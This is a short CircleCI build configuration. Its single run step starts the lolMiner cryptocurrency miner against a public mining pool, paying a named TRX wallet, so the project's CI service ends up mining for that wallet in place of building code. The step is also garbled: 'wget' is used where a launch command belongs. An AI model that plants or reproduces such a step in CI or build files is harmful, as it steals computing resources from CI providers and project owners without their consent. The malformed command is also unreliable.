version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget ./lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user TRX:TXsCRU5AhWH1YBFHF9kXbeM6PXFPyJpn8S.colab --ethstratum ETHPROXY
      